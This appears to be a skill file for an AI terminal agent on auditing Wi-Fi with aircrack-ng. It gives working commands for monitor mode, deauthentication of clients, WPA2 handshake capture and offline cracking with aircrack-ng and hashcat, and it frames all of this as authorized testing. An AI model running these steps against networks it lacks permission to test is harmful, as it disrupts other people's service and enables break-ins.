| name | aircrack-ng |
| description | Audit Wi-Fi networks with the aircrack-ng suite. Use when a user asks to test their own wireless network, capture WPA2 handshakes, crack captured handshakes offline, put an adapter into monitor mode, or perform a wireless pentest under an authorized engagement. |
| license | Apache-2.0 |
| compatibility | Linux, aircrack-ng 1.7+, monitor-mode-capable Wi-Fi adapter |
| metadata | {"author":"terminal-skills","version":"1.0.0","category":"devops","tags":["aircrack-ng","wireless-security","wpa2","penetration-testing","wifi"]} |
Aircrack-ng
Overview
Aircrack-ng is the reference suite for 802.11 security auditing. It captures wireless frames in monitor mode, extracts WPA/WPA2 4-way handshakes, and performs offline dictionary attacks against the captured handshake. The suite is airmon-ng (monitor mode), airodump-ng (capture), aireplay-ng (injection/deauth), and aircrack-ng (offline crack). Use exclusively on networks you own or have written permission to audit.
Instructions
Step 1: Put the Adapter in Monitor Mode
sudo airmon-ng
sudo airmon-ng check kill
sudo airmon-ng start wlan0
iw dev wlan0mon info | grep type
Step 2: Scan Nearby Networks
sudo airodump-ng wlan0mon
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
Step 3: Capture a WPA Handshake
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
aircrack-ng handshake-01.cap
Step 4: Crack the Handshake Offline
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap
john --wordlist=rockyou.txt --rules=KoreLogic --stdout \
| aircrack-ng -w - -b AA:BB:CC:DD:EE:FF handshake-01.cap
hcxpcapngtool -o hash.hc22000 handshake-01.cap
hashcat -m 22000 hash.hc22000 rockyou.txt
Step 5: Clean Up
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager
iw dev
Examples
Example 1: Audit Your Own Home Network
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
mkdir -p ~/audit && cd ~/audit
sudo airodump-ng -c 6 --bssid CC:CC:CC:CC:CC:CC -w home wlan0mon &
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b CC:CC:CC:CC:CC:CC home-01.cap
sudo airmon-ng stop wlan0mon
Example 2: GPU-Accelerated Cracking with Hashcat
sudo apt install hcxtools
hcxpcapngtool -o corporate.hc22000 corporate-01.cap
cat corporate.hc22000 | head
hashcat -m 22000 corporate.hc22000 \
/usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule \
--status --status-timer=10
hashcat -m 22000 corporate.hc22000 --show
Guidelines
- Written authorization is mandatory. Capturing or cracking a neighbor's Wi-Fi is a crime. Only audit your own networks or those covered by an engagement scope.
- Not every adapter supports monitor mode and injection. Proven chipsets: Atheros AR9271, Ralink RT3070, MediaTek MT7612U, Realtek RTL8812AU.
- Start with
airmon-ng check kill. NetworkManager will otherwise fight you for control of the interface.
- Deauth attacks are noisy and disruptive — use the minimum count (
--deauth 3-5) and target a single client, never the broadcast address.
- Only the WPA 4-way handshake is required for offline cracking; longer captures waste disk space.
- For modern networks, convert the capture to
.hc22000 and crack on a GPU with hashcat — CPU aircrack-ng is an order of magnitude slower.
- WPA3 SAE is not vulnerable to the classic offline handshake attack; aircrack-ng is for WPA/WPA2-PSK.
- Tear down monitor mode after the engagement so the host doesn't leak frames in routine use.